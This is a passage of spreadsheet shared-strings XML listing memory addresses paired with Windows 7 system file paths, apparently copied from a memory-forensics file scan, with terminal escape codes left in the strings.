    <t>\Windows\System32\drivers\fileinfo.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd1b08</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\fltMgr.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd1e20</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\amdxata.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd2f80</t>
  </si>
  <si>
    <t>0xdebd37a0</t>
  </si>
  <si>
    <t>0xdebd3c98</t>
  </si>
  <si>
    <t>0xdebd3dc8</t>
  </si>
  <si>
    <t>0xdebd5e90</t>
  </si>
  <si>
    <t>0xdebd6578</t>
  </si>
  <si>
    <t>\Windows\debug\wlms.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd67f0</t>
  </si>
  <si>
    <t>\Windows\System32\wlms\en-US\wlms.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd6c90</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd6df0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_help_windows_en-us_b594929e73669c5e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd7038</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\var\log\OpenSSHd.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd7e18</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft-windows-smbserver_31bf3856ad364e35_6.1.7601.24354_none</t>
  </si>
  <si>
    <t>_fb5a65f5625b</t>
  </si>
  <si>
    <t>fb98.manife</t>
  </si>
  <si>
    <t>st_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd7f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\vsstrace.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd8038</t>
  </si>
  <si>
    <t>0xdebd85e8</t>
  </si>
  <si>
    <t>\Windows\System32\config\TxR\{6cced300-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd8788</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wshqos.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd89b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd8a68</t>
  </si>
  <si>
    <t>0xdebd9220</t>
  </si>
  <si>
    <t>\_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd9770</t>
  </si>
  <si>
    <t>\Windows\System32\rpcrt4.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebd9828</t>
  </si>
  <si>
    <t>\Windows\System32\smss.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebda4c0</t>
  </si>
  <si>
    <t>\trkwks_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebda840</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\srv2.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdb240</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2918077~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdb570</t>
  </si>
  <si>
    <t>0xdebdb628</t>
  </si>
  <si>
    <t>0xdebdb908</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdbcf0</t>
  </si>
  <si>
    <t>0xdebdc038</t>
  </si>
  <si>
    <t>0xdebdc458</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2871997_SP1~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdc788</t>
  </si>
  <si>
    <t>0xdebdc840</t>
  </si>
  <si>
    <t>0xdebdcd30</t>
  </si>
  <si>
    <t>0xdebdcf80</t>
  </si>
  <si>
    <t>0xdebdd278</t>
  </si>
  <si>
    <t>0xdebdd330</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2532531~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdd5b8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\activeds.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdd720</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3110329~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebddce8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>0xdebddf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Client-Wired-Network-Drivers-Package~31bf3856ad3</t>
  </si>
  <si>
    <t>0xdebde2a0</t>
  </si>
  <si>
    <t>0xdebde5d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~en-</t>
  </si>
  <si>
    <t>0xdebde688</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2919469~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdec50</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3133977_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdf038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_3_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdf340</t>
  </si>
  <si>
    <t>0xdebdf610</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_124_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdf8c8</t>
  </si>
  <si>
    <t>0xdebdfc78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3138378_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebdfe18</t>
  </si>
  <si>
    <t>0xdebe0248</t>
  </si>
  <si>
    <t>0xdebe0630</t>
  </si>
  <si>
    <t>0xdebe0a18</t>
  </si>
  <si>
    <t>0xdebe0d48</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe0e00</t>
  </si>
  <si>
    <t>0xdebe0f80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_132_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe1038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_121_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe11a0</t>
  </si>
  <si>
    <t>0xdebe1598</t>
  </si>
  <si>
    <t>0xdebe1650</t>
  </si>
  <si>
    <t>~6.1.7601.1</t>
  </si>
  <si>
    <t>7514.m</t>
  </si>
  <si>
    <t>0xdebe1a38</t>
  </si>
  <si>
    <t>~6.1.7600.1</t>
  </si>
  <si>
    <t>6385.m</t>
  </si>
  <si>
    <t>um_x001B_[0K_x001B_[132G</t>
  </si>
  <si>
    <t>0xdebe1d68</t>
  </si>
  <si>
    <t>0xdebe1e20</t>
  </si>
  <si>
    <t>0xdebe2038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_137_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe20f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_351_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe21a8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_133_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe24d8</t>
  </si>
  <si>
    <t>0xdebe2590</t>
  </si>
  <si>
    <t>0xdebe2808</t>
  </si>
  <si>
    <t>0xdebe2bf0</t>
  </si>
  <si>
    <t>0xdebe2d78</t>
  </si>
  <si>
    <t>0xdebe2e30</t>
  </si>
  <si>
    <t>0xdebe2ee8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2853952_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe3438</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\srv.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe3c90</t>
  </si>
  <si>
    <t>0xdebe4038</t>
  </si>
  <si>
    <t>0xdebe4a98</t>
  </si>
  <si>
    <t>\Windows\System32\wbemcomn.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe5e80</t>
  </si>
  <si>
    <t>\$Extend\$ObjId_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe6038</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.RegularExpressions\2.0.0.0__b03f5f7f11d50a3a\System.Web.</t>
  </si>
  <si>
    <t>RegularExpres</t>
  </si>
  <si>
    <t>0xdebe66c8</t>
  </si>
  <si>
    <t>\Windows\System32\msxml3.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe72b0</t>
  </si>
  <si>
    <t>\Windows\System32\srvsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe8350</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\conhost.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe8cd8</t>
  </si>
  <si>
    <t>\Windows\System32\sppuinotify.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebe9b70</t>
  </si>
  <si>
    <t>\Windows\System32\browser.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebea500</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\MOF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebea670</t>
  </si>
  <si>
    <t>\Windows\System32\netmsg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebebc00</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygssp-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebebf80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\netmsg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebec690</t>
  </si>
  <si>
    <t>\Windows\System32\wscapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebec7d0</t>
  </si>
  <si>
    <t>\Windows\System32\pnpts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebeca20</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\usr\sbin\sshd.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebecb88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\user32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebed038</t>
  </si>
  <si>
    <t>0xdebed448</t>
  </si>
  <si>
    <t>\Windows\System32\iphlpsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebedf80</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiDcPrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebee498</t>
  </si>
  <si>
    <t>\Windows\System32\ega.cpi_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebef548</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\fastprox.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf01f0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygcrypt-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf0650</t>
  </si>
  <si>
    <t>\Windows\inf\netmscli.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf1198</t>
  </si>
  <si>
    <t>\Windows\servicing\Sessions\30725936_3277294388.bac_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf1298</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WinMgmtR.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf15c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPAFAC.tmp\UIAutomationProvider.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf19d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\ManifestCache\548c1bd2e27235ea_blobs.bin_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf1a88</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygcrypto-1.0.0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf1eb8</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygz.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf21a8</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wbemprox.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf2820</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cyggcc_s-1.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf2c28</t>
  </si>
  <si>
    <t>\Windows\System32\ntdsapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf2ce0</t>
  </si>
  <si>
    <t>\Windows\servicing\Sessions\30725936_2971238836.bac_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf3ca0</t>
  </si>
  <si>
    <t>0xdebf3d58</t>
  </si>
  <si>
    <t>\Windows\servicing\Sessions\30725936_2302616596.bac_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf4598</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygkrb5-3.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf4d38</t>
  </si>
  <si>
    <t>\Windows\inf\netrast.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf4eb8</t>
  </si>
  <si>
    <t>\Windows\inf\netsstpt.PNF_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf5038</t>
  </si>
  <si>
    <t>\Windows\servicing\Sessions\30725937_2583505884.bac_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf5160</t>
  </si>
  <si>
    <t>\Windows\servicing\en-US\CbsMsg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf5290</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cyggssapi_krb5-2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf5348</t>
  </si>
  <si>
    <t>0xdebf56b8</t>
  </si>
  <si>
    <t>\Windows\System32\sscore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf5eb8</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygiconv-2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf6528</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygk5crypto-3.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf6ad8</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygkrb5support-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf7038</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygintl-8.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf7330</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Caches\{AFE017C6-E4FE-42FD-90D6-99AED7E8B022}.2.ver0x0000000000</t>
  </si>
  <si>
    <t>000001.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf84a0</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\bin\cygcom_err-2.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf8558</t>
  </si>
  <si>
    <t>\cygwin-25f71ff67fa0e143-1740-sigwait_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebf8b98</t>
  </si>
  <si>
    <t>0xdebf8e08</t>
  </si>
  <si>
    <t>0xdebf9210</t>
  </si>
  <si>
    <t>0xdebfbce0</t>
  </si>
  <si>
    <t>\Windows\System32\netcfgx.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfc0a8</t>
  </si>
  <si>
    <t>0xdebfcd48</t>
  </si>
  <si>
    <t>\Windows\System32\resutils.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfce00</t>
  </si>
  <si>
    <t>\Program Files\OpenSSH\etc\sshd_config_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfcf80</t>
  </si>
  <si>
    <t>\Windows\System32\nci.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfd8a0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wbemcore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfe038</t>
  </si>
  <si>
    <t>0xdebfe148</t>
  </si>
  <si>
    <t>0xdebfe340</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1BA7.tmp\Microsoft.MediaCenter.Bml.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdebfe3f8</t>
  </si>
  <si>
    <t>0xdebfe8e0</t>
  </si>
  <si>
    <t>eSystem.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfeaa8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WsmSvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebfeea8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\inetres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdebff5f8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_performance_02bd33cc045df684.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec00130</t>
  </si>
  <si>
    <t>\InitShutdown_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec002c8</t>
  </si>
  <si>
    <t>0xdec00c78</t>
  </si>
  <si>
    <t>\Windows\System32\msprivs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec01038</t>
  </si>
  <si>
    <t>0xdec01858</t>
  </si>
  <si>
    <t>\Windows\System32\services.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec02be0</t>
  </si>
  <si>
    <t>0xdec02d00</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7</t>
  </si>
  <si>
    <t>600.16385_en-</t>
  </si>
  <si>
    <t>us_020378a8</t>
  </si>
  <si>
    <t>991bbc</t>
  </si>
  <si>
    <t>c2.manifest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec035d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.188</t>
  </si>
  <si>
    <t>37_none_ec86b</t>
  </si>
  <si>
    <t>8d6858ec0bc</t>
  </si>
  <si>
    <t>.manif</t>
  </si>
  <si>
    <t>est_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec03688</t>
  </si>
  <si>
    <t>\Windows\System32\lsass.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec037d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.systemcompatible_6595b64144ccf1df_6.0.7600.163</t>
  </si>
  <si>
    <t>85_none_49adc</t>
  </si>
  <si>
    <t>cbde8169a03</t>
  </si>
  <si>
    <t>0xdec03e38</t>
  </si>
  <si>
    <t>\Windows\System32\sxs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec04b68</t>
  </si>
  <si>
    <t>0xdec05520</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.isolationautomation_6595b64144ccf1df_1.0.0.0_n</t>
  </si>
  <si>
    <t>one_35d357a66</t>
  </si>
  <si>
    <t>c38ade4.man</t>
  </si>
  <si>
    <t>ifest_x001B_</t>
  </si>
  <si>
    <t>0xdec059d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.i..utomation.proxystub_6595b64144ccf1df_1.0.76</t>
  </si>
  <si>
    <t>00.16385_none</t>
  </si>
  <si>
    <t>_9d148a8db8</t>
  </si>
  <si>
    <t>d32238</t>
  </si>
  <si>
    <t>.manifest_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec05a88</t>
  </si>
  <si>
    <t>\Windows\System32\sysntfy.dll_x001B_[0K_x001B_[150G</t>
  </si>
  <si>
    <t>0xdec05f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\trado.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec06630</t>
  </si>
  <si>
    <t>\Windows\System32\apphelp.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec06a18</t>
  </si>
  <si>
    <t>\Windows\Fonts\frank.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec06ce0</t>
  </si>
  <si>
    <t>\Windows\System32\webio.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec06d98</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24356_none_5</t>
  </si>
  <si>
    <t>c07bd39a00d5b</t>
  </si>
  <si>
    <t>a6.manifest</t>
  </si>
  <si>
    <t>0xdec06eb8</t>
  </si>
  <si>
    <t>\Windows\System32\cryptbase.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec07558</t>
  </si>
  <si>
    <t>\Windows\AppPatch\sysmain.sdb_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec07928</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsaui.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec07a50</t>
  </si>
  <si>
    <t>0xdec08420</t>
  </si>
  <si>
    <t>0xdec09328</t>
  </si>
  <si>
    <t>\Windows\System32\scext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec098e8</t>
  </si>
  <si>
    <t>0xdec09be8</t>
  </si>
  <si>
    <t>0xdec09f80</t>
  </si>
  <si>
    <t>\Windows\System32\sspicli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0a510</t>
  </si>
  <si>
    <t>0xdec0a960</t>
  </si>
  <si>
    <t>\Windows\System32\secur32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0ae88</t>
  </si>
  <si>
    <t>0xdec0c320</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\BDATunePIA\f73b9d6dd6380f9c7f51_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0c768</t>
  </si>
  <si>
    <t>\Windows\Fonts\tradbdo.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0c820</t>
  </si>
  <si>
    <t>\Windows\System32\scesrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0c948</t>
  </si>
  <si>
    <t>\Windows\Fonts\mriam.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0ccb8</t>
  </si>
  <si>
    <t>\lsass_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0cd70</t>
  </si>
  <si>
    <t>\Windows\System32\sspisrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0d038</t>
  </si>
  <si>
    <t>\Windows\System32\lsasrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0d5f0</t>
  </si>
  <si>
    <t>\Windows\System32\bcrypt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0da80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\services.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0dcc8</t>
  </si>
  <si>
    <t>\Windows\System32\wmsgapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0df80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP387B.tmp\System.Windows.Forms.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0f168</t>
  </si>
  <si>
    <t>\Windows\System32\cryptdll.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec0ff30</t>
  </si>
  <si>
    <t>\Windows\System32\samsrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec10620</t>
  </si>
  <si>
    <t>\Windows\System32\cngaudit.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec10868</t>
  </si>
  <si>
    <t>\Windows\System32\wevtapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec11038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP3C7.tmp\System.Workflow.ComponentModel.dl</t>
  </si>
  <si>
    <t>0xdec11960</t>
  </si>
  <si>
    <t>\Windows\System32\themeservice.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec12388</t>
  </si>
  <si>
    <t>\Windows\win.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec12cc8</t>
  </si>
  <si>
    <t>0xdec13038</t>
  </si>
  <si>
    <t>\Windows\System32\authz.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec13708</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiauz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec13cc8</t>
  </si>
  <si>
    <t>\Windows\System32\dssenh.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec14480</t>
  </si>
  <si>
    <t>\Windows\System32\config\SECURITY.LOG2_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec146c8</t>
  </si>
  <si>
    <t>\Windows\System32\ncrypt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec14c00</t>
  </si>
  <si>
    <t>\Windows\Fonts\angsab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec154d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcei.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec156c8</t>
  </si>
  <si>
    <t>\Windows\Fonts\cordiaui.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec15a30</t>
  </si>
  <si>
    <t>0xdec15d90</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcdb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec16588</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcfb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec16a50</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcfl.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec16af8</t>
  </si>
  <si>
    <t>\Windows\System32\config\RegBack\SECURITY_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec16d78</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcdbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec16f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec17350</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\lsasrv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec175c8</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcjb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec18038</t>
  </si>
  <si>
    <t>\Windows\Fonts\upceb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec18488</t>
  </si>
  <si>
    <t>\Windows\System32\riched20.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec18530</t>
  </si>
  <si>
    <t>0xdec19148</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\mcepg\2d65be338deb3a7baff7_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec19858</t>
  </si>
  <si>
    <t>\Windows\System32\config\SECURITY.LOG1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec19d90</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Web.Services\afa5e0669297d0caea7e_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec19f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcii.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1a928</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcebi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1ab18</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcel.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1ad58</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.ServiceModel\522cf1786bd6aac4fe38_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1b038</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcdi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1b280</t>
  </si>
  <si>
    <t>\Windows\Fonts\upcil.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdec1b7b0</t>
  </si>
  <si>
